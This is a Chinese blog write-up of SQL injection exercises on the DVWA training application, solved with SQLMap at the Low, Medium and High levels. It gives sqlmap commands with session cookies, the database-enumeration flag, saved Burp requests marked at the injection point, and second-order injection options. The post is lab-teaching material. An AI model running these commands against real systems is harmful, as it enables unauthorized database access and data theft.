DVWA SQL Injection 利用SQLMap注入

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量732 收藏 5
点赞数 1
分类专栏: 靶场搭建与使用 文章标签: DVWA SQL注入 SQLMap writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/114985628
版权

DVWA SQL Injection 利用SQLMap注入

Low

在这里插入图片描述
输入1,提交后得到回显:
在这里插入图片描述
发现是GET传参:

http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

直接携带Cookie后使用SQLMap注入即可:

sqlmap -u "http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=t3t1ero0s2ndmdmef7v2b26l7i"

得到如下结果:
在这里插入图片描述
使用-dbs参数可以获取数据库名:

sqlmap -u "http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=t3t1ero0s2ndmdmef7v2b26l7i" -dbs

得到回显:
在这里插入图片描述
完成对Low级别的注入。

Medium

在这里插入图片描述
需要下拉选择提交的参数,提交后得到回显:
在这里插入图片描述
可以查询到当前用户的信息,发现是POST传参名,使用BurpSuite抓取数据包:
在这里插入图片描述
将数据包保存到本地:
在这里插入图片描述
方法一:
使用SQLMap的-data参数:

sqlmap -r /root/桌面/1.txt  --data id

得到回显:
在这里插入图片描述
方法二:
在需要注入的参数后加*号:
在这里插入图片描述

sqlmap -r /root/桌面/1.txt

也可以得到相同的结果。

High

在这里插入图片描述
点击连接后,跳转到新页面:
在这里插入图片描述
尝试输入1
在这里插入图片描述
原页面也发生变化:
在这里插入图片描述
尝试抓取提交参数时的数据包:
在这里插入图片描述

将其保存在本地,并选择Medium方法二,将其注入点添加*号:
在这里插入图片描述
使用--second-url参数,并携带Cookie进行注入:

sqlmap -r /root/桌面/1.txt --cookie="security=high; PHPSESSID=7dkp4kopq14e88u38amn47infv" --second-url="http://10.203.87.166/dvwa/vulnerabilities/sqli/"

得到回显:
在这里插入图片描述
完成对High级别的注入

Senimo_
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 400
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
sqlmap详细教程
简介
01-04 3165
SQLmqp教程!
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1197
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmapsql注入漏洞的防御
weixin_46838716的博客
03-04 1705
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmapsql注入漏洞的防御
SQL注入部分:DVWA+SQLmap+Mysql注入实战
AZXYZNPY的博客
11-21 675
(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。注意:应当在第一个页面就点检查,而不是点击检查源代码之后再点击检查,然后就能获得cookie值,而且每次实验的值都不一样,因此做实验最好一次做完。7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用的数据库名称和用户名。5、枚举数据库和指定数据库的数据表。--dbs:枚举当前数据库。-T:指定数据库中的数据表。
sqlmap在windows上执行sql注入利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA下的SQL注入
07-25
SQL
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行SQL注入low级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE)
最新发布
05-30
Windows中DVWA通关必备软件集(DVWA、PHPStudy、SqlMap、BurpSuite、AntSword、Python、JRE),包含安装使用说明。 Windows中部署DVWADVWA、PHPStudy Windows中使用SqlMapSqlMap、Python Windows中使用BurpSuite...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 4504
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
【网络安全 | 渗透工具SQLmap加密注入教程+实战详析
等风来
08-02 6058
使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3355
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1779
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4696
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4615
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 5492
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
SQLMAP入门命令解析
kk的博客
05-27 714
sql注入常用命令解析
dvwa sql注入 sqlmap
10-31
DVWA是一个用于演示Web应用程序安全漏洞的虚拟机,其中包括了SQL注入漏洞。而SQLMap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。在使用SQLMap进行DVWA SQL注入时,可以通过获取数据库名称、表名、列名等信息,进而进行数据的读取、修改、删除等操作。具体使用方法可以参考引用中提供的链接和命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值